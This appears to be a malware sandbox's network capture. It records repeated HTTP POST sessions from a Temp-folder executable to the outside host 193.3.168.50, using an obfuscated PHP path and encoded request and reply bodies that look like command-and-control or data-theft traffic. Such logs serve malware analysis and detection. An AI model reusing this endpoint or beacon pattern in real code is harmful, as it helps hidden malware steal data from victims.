                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  Vary: Accept-Encoding
                                                                                                                  Data Raw: 34 0d 0a 3b 59 5c 57 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 4;Y\W0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  32192.168.2.449782193.3.168.50807244C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Dec 5, 2024 10:53:59.012243986 CET441OUTPOST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/octet-stream
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                                                  Host: 193.3.168.50
                                                                                                                  Content-Length: 1060
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Dec 5, 2024 10:53:59.362354994 CET1060OUTData Raw: 5f 5c 5a 5f 59 5a 5f 57 5a 58 51 52 55 50 5a 5c 50 50 5d 5f 59 5e 57 42 5e 5f 5d 53 54 5b 55 5d 59 58 50 50 50 5c 51 5e 47 52 53 50 51 5a 5f 5b 56 56 5c 59 58 57 5a 51 50 58 56 50 58 5c 51 5d 5a 5c 5f 59 51 5c 55 55 43 52 42 50 5d 5b 59 51 52 56
                                                                                                                  Data Ascii: _\Z_YZ_WZXQRUPZ\PP]_Y^WB^_]ST[U]YXPPP\Q^GRSPQZ_[VV\YXWZQPXVPX\Q]Z\_YQ\UUCRBP][YQRVZSTAZZSRQ]X_PRXX[VTX[Y^Q_STTY\PYQR_]XV[__T\VCT\RQQY\]ZX]_ZR^Z\T[Y]PXTY_C_^PZ_^[U_\X[QV_\VYXU_RGY^]]RP\-,:=)#76-/?! ?9 0,$T#9$- " )-#G $],
                                                                                                                  Dec 5, 2024 10:54:00.249665022 CET25INHTTP/1.1 100 Continue


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  33192.168.2.449783193.3.168.50807244C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Dec 5, 2024 10:54:00.342746973 CET441OUTPOST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/octet-stream
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                                                  Host: 193.3.168.50
                                                                                                                  Content-Length: 1936
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Dec 5, 2024 10:54:00.690269947 CET1936OUTData Raw: 5a 5a 5a 59 5c 5d 5a 55 5a 58 51 52 55 53 5a 5c 50 51 5d 5f 59 5a 57 40 5e 5f 5d 53 54 5b 55 5d 59 58 50 50 50 5c 51 5e 47 52 53 50 51 5a 5f 5b 56 56 5c 59 58 57 5a 51 50 58 56 50 58 5c 51 5d 5a 5c 5f 59 51 5c 55 55 43 52 42 50 5d 5b 59 51 52 56
                                                                                                                  Data Ascii: ZZZY\]ZUZXQRUSZ\PQ]_YZW@^_]ST[U]YXPPP\Q^GRSPQZ_[VV\YXWZQPXVPX\Q]Z\_YQ\UUCRBP][YQRVZSTAZZSRQ]X_PRXX[VTX[Y^Q_STTY\PYQR_]XV[__T\VCT\RQQY\]ZX]_ZR^Z\T[Y]PXTY_C_^PZ_^[U_\X[QV_\VYXU_RGY^]]RP\.Y/06<9? =.?=!*7-34',#"'><#0#(-#G $],5
                                                                                                                  Dec 5, 2024 10:54:01.580931902 CET25INHTTP/1.1 100 Continue
                                                                                                                  Dec 5, 2024 10:54:01.813365936 CET349INHTTP/1.1 200 OK
                                                                                                                  Server: nginx
                                                                                                                  Date: Thu, 05 Dec 2024 09:54:01 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  Vary: Accept-Encoding
                                                                                                                  Data Raw: 39 38 0d 0a 09 11 25 1d 24 3b 28 1c 33 2c 24 09 2b 55 3c 13 2d 0a 23 11 24 2d 3d 0b 27 3a 2f 1e 3d 3a 01 11 36 04 25 05 3f 17 37 56 2b 37 30 56 29 02 20 58 00 1a 25 00 20 31 30 10 2d 2a 30 5d 25 5b 31 02 26 3e 39 5d 28 39 3f 1b 2a 33 34 53 31 00 0c 1a 29 23 3e 08 2d 34 3d 5e 3a 2d 31 07 25 2f 2a 52 0e 17 21 1b 3d 2d 3c 12 20 22 3e 08 3d 32 24 00 2b 59 2c 0e 24 5e 25 09 20 07 25 56 33 33 39 1f 24 1c 0f 0f 25 38 37 5b 31 01 3f 03 29 13 20 5f 2e 05 20 57 00 31 57 54 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 98%$;(3,$+U<-#$-=':/=:6%?7V+70V) X% 10-*0]%[1&>9](9?*34S1)#>-4=^:-1%/*R!=-< ">=2$+Y,$^% %V339$%87[1?) _. W1WT0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  34192.168.2.449784193.3.168.50807244C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Dec 5, 2024 10:54:00.463274002 CET441OUTPOST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/octet-stream
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                                                  Host: 193.3.168.50
                                                                                                                  Content-Length: 1060
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Dec 5, 2024 10:54:00.815298080 CET1060OUTData Raw: 5a 5d 5f 53 59 5c 5a 5f 5a 58 51 52 55 50 5a 52 50 50 5d 5f 59 5c 57 49 5e 5f 5d 53 54 5b 55 5d 59 58 50 50 50 5c 51 5e 47 52 53 50 51 5a 5f 5b 56 56 5c 59 58 57 5a 51 50 58 56 50 58 5c 51 5d 5a 5c 5f 59 51 5c 55 55 43 52 42 50 5d 5b 59 51 52 56
                                                                                                                  Data Ascii: Z]_SY\Z_ZXQRUPZRPP]_Y\WI^_]ST[U]YXPPP\Q^GRSPQZ_[VV\YXWZQPXVPX\Q]Z\_YQ\UUCRBP][YQRVZSTAZZSRQ]X_PRXX[VTX[Y^Q_STTY\PYQR_]XV[__T\VCT\RQQY\]ZX]_ZR^Z\T[Y]PXTY_C_^PZ_^[U_\X[QV_\VYXU_RGY^]]RP\-/ )( 582!9W-8'?#T5$.<E!#)-#G $],
                                                                                                                  Dec 5, 2024 10:54:01.700419903 CET25INHTTP/1.1 100 Continue
                                                                                                                  Dec 5, 2024 10:54:01.933358908 CET200INHTTP/1.1 200 OK
                                                                                                                  Server: nginx
                                                                                                                  Date: Thu, 05 Dec 2024 09:54:01 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  Vary: Accept-Encoding
                                                                                                                  Data Raw: 34 0d 0a 3b 59 5c 57 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 4;Y\W0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  35192.168.2.449790193.3.168.50807244C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Dec 5, 2024 10:54:02.182672024 CET417OUTPOST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/octet-stream
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                                                  Host: 193.3.168.50
                                                                                                                  Content-Length: 1060
                                                                                                                  Expect: 100-continue
                                                                                                                  Dec 5, 2024 10:54:02.533929110 CET1060OUTData Raw: 5f 5d 5f 5d 5c 5d 5f 54 5a 58 51 52 55 5e 5a 5d 50 5e 5d 52 59 5e 57 41 5e 5f 5d 53 54 5b 55 5d 59 58 50 50 50 5c 51 5e 47 52 53 50 51 5a 5f 5b 56 56 5c 59 58 57 5a 51 50 58 56 50 58 5c 51 5d 5a 5c 5f 59 51 5c 55 55 43 52 42 50 5d 5b 59 51 52 56
                                                                                                                  Data Ascii: _]_]\]_TZXQRU^Z]P^]RY^WA^_]ST[U]YXPPP\Q^GRSPQZ_[VV\YXWZQPXVPX\Q]Z\_YQ\UUCRBP][YQRVZSTAZZSRQ]X_PRXX[VTX[Y^Q_STTY\PYQR_]XV[__T\VCT\RQQY\]ZX]_ZR^Z\T[Y]PXTY_C_^PZ_^[U_\X[QV_\VYXU_RGY^]]RP\-,&=:;#&/<=Y 9$:]'8R!2-X$#60S)#G $],
                                                                                                                  Dec 5, 2024 10:54:03.423392057 CET25INHTTP/1.1 100 Continue
                                                                                                                  Dec 5, 2024 10:54:03.657381058 CET200INHTTP/1.1 200 OK
                                                                                                                  Server: nginx
                                                                                                                  Date: Thu, 05 Dec 2024 09:54:03 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  Vary: Accept-Encoding
                                                                                                                  Data Raw: 34 0d 0a 3b 59 5c 57 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 4;Y\W0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  36192.168.2.449796193.3.168.50807244C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Dec 5, 2024 10:54:04.097999096 CET417OUTPOST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/octet-stream
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                                                  Host: 193.3.168.50
                                                                                                                  Content-Length: 1060
                                                                                                                  Expect: 100-continue
                                                                                                                  Dec 5, 2024 10:54:04.456852913 CET1060OUTData Raw: 5f 59 5f 5c 59 57 5a 50 5a 58 51 52 55 52 5a 5b 50 50 5d 59 59 53 57 48 5e 5f 5d 53 54 5b 55 5d 59 58 50 50 50 5c 51 5e 47 52 53 50 51 5a 5f 5b 56 56 5c 59 58 57 5a 51 50 58 56 50 58 5c 51 5d 5a 5c 5f 59 51 5c 55 55 43 52 42 50 5d 5b 59 51 52 56
                                                                                                                  Data Ascii: _Y_\YWZPZXQRURZ[PP]YYSWH^_]ST[U]YXPPP\Q^GRSPQZ_[VV\YXWZQPXVPX\Q]Z\_YQ\UUCRBP][YQRVZSTAZZSRQ]X_PRXX[VTX[Y^Q_STTY\PYQR_]XV[__T\VCT\RQQY\]ZX]_ZR^Z\T[Y]PXTY_C_^PZ_^[U_\X[QV_\VYXU_RGY^]]RP\._8 <90Y45=8)7,-?Z0,(U!"0=/"==#G $],1
                                                                                                                  Dec 5, 2024 10:54:05.335057974 CET25INHTTP/1.1 100 Continue
                                                                                                                  Dec 5, 2024 10:54:05.573086977 CET200INHTTP/1.1 200 OK
                                                                                                                  Server: nginx
                                                                                                                  Date: Thu, 05 Dec 2024 09:54:05 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  Vary: Accept-Encoding
                                                                                                                  Data Raw: 34 0d 0a 3b 59 5c 57 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 4;Y\W0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  37192.168.2.449802193.3.168.50807244C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Dec 5, 2024 10:54:05.806138039 CET417OUTPOST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/octet-stream
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                                                  Host: 193.3.168.50
                                                                                                                  Content-Length: 1060
                                                                                                                  Expect: 100-continue
                                                                                                                  Dec 5, 2024 10:54:06.159145117 CET1060OUTData Raw: 5f 5f 5f 53 59 56 5a 51 5a 58 51 52 55 5f 5a 5d 50 52 5d 58 59 52 57 40 5e 5f 5d 53 54 5b 55 5d 59 58 50 50 50 5c 51 5e 47 52 53 50 51 5a 5f 5b 56 56 5c 59 58 57 5a 51 50 58 56 50 58 5c 51 5d 5a 5c 5f 59 51 5c 55 55 43 52 42 50 5d 5b 59 51 52 56
                                                                                                                  Data Ascii: ___SYVZQZXQRU_Z]PR]XYRW@^_]ST[U]YXPPP\Q^GRSPQZ_[VV\YXWZQPXVPX\Q]Z\_YQ\UUCRBP][YQRVZSTAZZSRQ]X_PRXX[VTX[Y^Q_STTY\PYQR_]XV[__T\VCT\RQQY\]ZX]_ZR^Z\T[Y]PXTY_C_^PZ_^[U_\X[QV_\VYXU_RGY^]]RP\-/=^< 6:\;9Y#9?. ;\3Z$#:'$!+*-#G $],


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  38192.168.2.449803193.3.168.50807244C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Dec 5, 2024 10:54:06.938783884 CET441OUTPOST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/octet-stream
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                                                  Host: 193.3.168.50
                                                                                                                  Content-Length: 1936
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Dec 5, 2024 10:54:07.284147024 CET1936OUTData Raw: 5f 51 5a 5f 59 5c 5a 55 5a 58 51 52 55 5e 5a 58 50 5e 5d 5d 59 5a 57 43 5e 5f 5d 53 54 5b 55 5d 59 58 50 50 50 5c 51 5e 47 52 53 50 51 5a 5f 5b 56 56 5c 59 58 57 5a 51 50 58 56 50 58 5c 51 5d 5a 5c 5f 59 51 5c 55 55 43 52 42 50 5d 5b 59 51 52 56
                                                                                                                  Data Ascii: _QZ_Y\ZUZXQRU^ZXP^]]YZWC^_]ST[U]YXPPP\Q^GRSPQZ_[VV\YXWZQPXVPX\Q]Z\_YQ\UUCRBP][YQRVZSTAZZSRQ]X_PRXX[VTX[Y^Q_STTY\PYQR_]XV[__T\VCT\RQQY\]ZX]_ZR^Z\T[Y]PXTY_C_^PZ_^[U_\X[QV_\VYXU_RGY^]]RP\.^8>=*47"]/,!4:+9#0</!1)'.<C5)=#G $],
                                                                                                                  Dec 5, 2024 10:54:08.175604105 CET25INHTTP/1.1 100 Continue
                                                                                                                  Dec 5, 2024 10:54:08.409806013 CET349INHTTP/1.1 200 OK
                                                                                                                  Server: nginx
                                                                                                                  Date: Thu, 05 Dec 2024 09:54:07 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  Vary: Accept-Encoding
                                                                                                                  Data Raw: 39 38 0d 0a 09 11 26 02 24 15 23 0d 30 3c 2b 57 3c 23 28 5f 2d 23 3c 03 30 07 2d 42 32 2a 09 1f 3d 04 37 58 36 03 21 01 28 2a 38 0c 3c 27 2b 0a 28 28 20 58 00 1a 26 14 20 0b 30 5a 2e 00 2c 58 31 03 36 5d 24 04 26 03 2a 17 33 57 3d 33 2b 0b 31 07 2a 1b 29 30 2a 0d 3b 1a 29 15 3a 2d 2e 58 26 3f 2a 52 0e 17 22 09 2a 2e 20 58 37 08 3e 0e 28 32 3f 5d 3f 3f 2f 55 27 5e 21 08 23 3e 07 1c 24 30 36 0e 24 0c 35 0a 27 28 2b 5a 26 2f 0a 5d 2a 39 20 5f 2e 05 20 57 00 31 57 54 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 98&$#0<+W<#(_-#<0-B2*=7X6!(*8<'+(( X& 0Z.,X16]$&*3W=3+1*)0*;):-.X&?*R"*. X7>(2?]??/U'^!#>$06$5'(+Z&/]*9 _. W1WT0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  39192.168.2.449804193.3.168.50807244C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Dec 5, 2024 10:54:07.059884071 CET441OUTPOST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/octet-stream
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                                                  Host: 193.3.168.50
                                                                                                                  Content-Length: 1060
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Dec 5, 2024 10:54:07.408967972 CET1060OUTData Raw: 5a 5d 5f 5f 5c 5d 5a 57 5a 58 51 52 55 50 5a 5d 50 51 5d 5e 59 59 57 49 5e 5f 5d 53 54 5b 55 5d 59 58 50 50 50 5c 51 5e 47 52 53 50 51 5a 5f 5b 56 56 5c 59 58 57 5a 51 50 58 56 50 58 5c 51 5d 5a 5c 5f 59 51 5c 55 55 43 52 42 50 5d 5b 59 51 52 56
                                                                                                                  Data Ascii: Z]__\]ZWZXQRUPZ]PQ]^YYWI^_]ST[U]YXPPP\Q^GRSPQZ_[VV\YXWZQPXVPX\Q]Z\_YQ\UUCRBP][YQRVZSTAZZSRQ]X_PRXX[VTX[Y^Q_STTY\PYQR_]XV[__T\VCT\RQQY\]ZX]_ZR^Z\T[Y]PXTY_C_^PZ_^[U_\X[QV_\VYXU_RGY^]]RP\.8#>(( ;<"#8-#X$/'#1*3X D"T)#G $],
                                                                                                                  Dec 5, 2024 10:54:08.298099995 CET25INHTTP/1.1 100 Continue
                                                                                                                  Dec 5, 2024 10:54:08.533394098 CET200INHTTP/1.1 200 OK
                                                                                                                  Server: nginx
                                                                                                                  Date: Thu, 05 Dec 2024 09:54:08 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  Vary: Accept-Encoding
                                                                                                                  Data Raw: 34 0d 0a 3b 59 5c 57 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 4;Y\W0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  40192.168.2.449810193.3.168.50807244C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Dec 5, 2024 10:54:09.049104929 CET417OUTPOST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/octet-stream
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                                                  Host: 193.3.168.50
                                                                                                                  Content-Length: 1060
                                                                                                                  Expect: 100-continue
                                                                                                                  Dec 5, 2024 10:54:09.393372059 CET1060OUTData Raw: 5f 59 5f 58 5c 59 5a 53 5a 58 51 52 55 53 5a 52 50 54 5d 5b 59 52 57 41 5e 5f 5d 53 54 5b 55 5d 59 58 50 50 50 5c 51 5e 47 52 53 50 51 5a 5f 5b 56 56 5c 59 58 57 5a 51 50 58 56 50 58 5c 51 5d 5a 5c 5f 59 51 5c 55 55 43 52 42 50 5d 5b 59 51 52 56
                                                                                                                  Data Ascii: _Y_X\YZSZXQRUSZRPT][YRWA^_]ST[U]YXPPP\Q^GRSPQZ_[VV\YXWZQPXVPX\Q]Z\_YQ\UUCRBP][YQRVZSTAZZSRQ]X_PRXX[VTX[Y^Q_STTY\PYQR_]XV[__T\VCT\RQQY\]ZX]_ZR^Z\T[Y]PXTY_C_^PZ_^[U_\X[QV_\VYXU_RGY^]]RP\.^/ >=)]4*,<14;9#$%,7T9_'-0A! (V)#G $],5
                                                                                                                  Dec 5, 2024 10:54:10.287276983 CET25INHTTP/1.1 100 Continue
                                                                                                                  Dec 5, 2024 10:54:10.521159887 CET200INHTTP/1.1 200 OK
                                                                                                                  Server: nginx
                                                                                                                  Date: Thu, 05 Dec 2024 09:54:10 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  Vary: Accept-Encoding
                                                                                                                  Data Raw: 34 0d 0a 3b 59 5c 57 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 4;Y\W0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  41192.168.2.449816193.3.168.50807244C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Dec 5, 2024 10:54:10.765209913 CET441OUTPOST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/octet-stream
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                                                  Host: 193.3.168.50
                                                                                                                  Content-Length: 1060
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Dec 5, 2024 10:54:11.112150908 CET1060OUTData Raw: 5f 59 5f 52 59 5c 5a 5e 5a 58 51 52 55 5e 5a 59 50 56 5d 5c 59 5a 57 49 5e 5f 5d 53 54 5b 55 5d 59 58 50 50 50 5c 51 5e 47 52 53 50 51 5a 5f 5b 56 56 5c 59 58 57 5a 51 50 58 56 50 58 5c 51 5d 5a 5c 5f 59 51 5c 55 55 43 52 42 50 5d 5b 59 51 52 56
                                                                                                                  Data Ascii: _Y_RY\Z^ZXQRU^ZYPV]\YZWI^_]ST[U]YXPPP\Q^GRSPQZ_[VV\YXWZQPXVPX\Q]Z\_YQ\UUCRBP][YQRVZSTAZZSRQ]X_PRXX[VTX[Y^Q_STTY\PYQR_]XV[__T\VCT\RQQY\]ZX]_ZR^Z\T[Y]PXTY_C_^PZ_^[U_\X[QV_\VYXU_RGY^]]RP\-/?_7#:8!9U. $<<W71%_0-0D##8V==#G $],
                                                                                                                  Dec 5, 2024 10:54:12.002557993 CET25INHTTP/1.1 100 Continue
                                                                                                                  Dec 5, 2024 10:54:12.237816095 CET200INHTTP/1.1 200 OK
                                                                                                                  Server: nginx
                                                                                                                  Date: Thu, 05 Dec 2024 09:54:11 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  Vary: Accept-Encoding
                                                                                                                  Data Raw: 34 0d 0a 3b 59 5c 57 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 4;Y\W0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  42192.168.2.449822193.3.168.50807244C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Dec 5, 2024 10:54:12.480917931 CET441OUTPOST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/octet-stream
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                                                  Host: 193.3.168.50
                                                                                                                  Content-Length: 1060
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Dec 5, 2024 10:54:12.830893040 CET1060OUTData Raw: 5a 59 5a 5f 59 5f 5a 54 5a 58 51 52 55 50 5a 52 50 5e 5d 5a 59 5c 57 43 5e 5f 5d 53 54 5b 55 5d 59 58 50 50 50 5c 51 5e 47 52 53 50 51 5a 5f 5b 56 56 5c 59 58 57 5a 51 50 58 56 50 58 5c 51 5d 5a 5c 5f 59 51 5c 55 55 43 52 42 50 5d 5b 59 51 52 56
                                                                                                                  Data Ascii: ZYZ_Y_ZTZXQRUPZRP^]ZY\WC^_]ST[U]YXPPP\Q^GRSPQZ_[VV\YXWZQPXVPX\Q]Z\_YQ\UUCRBP][YQRVZSTAZZSRQ]X_PRXX[VTX[Y^Q_STTY\PYQR_]XV[__T\VCT\RQQY\]ZX]_ZR^Z\T[Y]PXTY_C_^PZ_^[U_\X[QV_\VYXU_RGY^]]RP\.-#5<(]46\,/%!9(T,33]3/#%.8B!3?)=#G $],


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  43192.168.2.449823193.3.168.50807244C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Dec 5, 2024 10:54:13.546973944 CET441OUTPOST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/octet-stream
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                                                  Host: 193.3.168.50
                                                                                                                  Content-Length: 1908
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Dec 5, 2024 10:54:13.937997103 CET1908OUTData Raw: 5a 59 5a 5c 59 5d 5a 52 5a 58 51 52 55 51 5a 53 50 51 5d 53 59 5d 57 49 5e 5f 5d 53 54 5b 55 5d 59 58 50 50 50 5c 51 5e 47 52 53 50 51 5a 5f 5b 56 56 5c 59 58 57 5a 51 50 58 56 50 58 5c 51 5d 5a 5c 5f 59 51 5c 55 55 43 52 42 50 5d 5b 59 51 52 56
                                                                                                                  Data Ascii: ZYZ\Y]ZRZXQRUQZSPQ]SY]WI^_]ST[U]YXPPP\Q^GRSPQZ_[VV\YXWZQPXVPX\Q]Z\_YQ\UUCRBP][YQRVZSTAZZSRQ]X_PRXX[VTX[Y^Q_STTY\PYQR_]XV[__T\VCT\RQQY\]ZX]_ZR^Z\T[Y]PXTY_C_^PZ_^[U_\X[QV_\VYXU_RGY^]]RP\-;0_<:$[7P:Z,%Y#* -X$(S !>0-0"# V=-#G $],=
                                                                                                                  Dec 5, 2024 10:54:14.785610914 CET25INHTTP/1.1 100 Continue
                                                                                                                  Dec 5, 2024 10:54:15.021601915 CET349INHTTP/1.1 200 OK
                                                                                                                  Server: nginx
                                                                                                                  Date: Thu, 05 Dec 2024 09:54:14 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  Vary: Accept-Encoding
